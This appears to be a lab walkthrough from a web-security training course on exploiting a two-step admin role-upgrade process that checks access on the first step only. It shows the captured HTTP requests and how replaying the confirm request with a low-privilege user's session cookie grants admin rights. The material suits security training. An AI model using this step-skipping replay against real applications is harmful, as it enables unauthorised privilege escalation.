Multi-step process with no access control on one step

This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

After gaining access with administrator credentials (administrator:admin), I explored the admin panel functionalities and identified the "upgrade" feature for elevating user roles. Attempting to upgrade the "carlos" user, I encountered a two-step process. First, I needed to submit the user for upgrade, and then confirm the upgrade with a second request:

Request to submit the upgrade:

POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=7FxCRLXLP4Jf7twGl22ZDyda1np5q9y3
Content-Length: 30
...

username=carlos&action=upgrade

Request to confirm the upgrade:

POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=7FxCRLXLP4Jf7twGl22ZDyda1np5q9y3
Content-Length: 45
...

action=upgrade&confirmed=true&username=carlos

Upon logging out and logging in as "wiener," I bypassed the first step's control and directly sent the second request, altering the session cookie. The modified request was:

POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=VwhUhOWmV6FzSmK0jwwEOZZ8Pb9dpkxA
Content-Length: 45
...

action=upgrade&confirmed=true&username=wiener

By executing this maneuver, "wiener" was successfully upgraded to an admin, resolving the lab.

PreviousMethod-based access control can be circumvented NextReferer-based access control

Last updated 2 years ago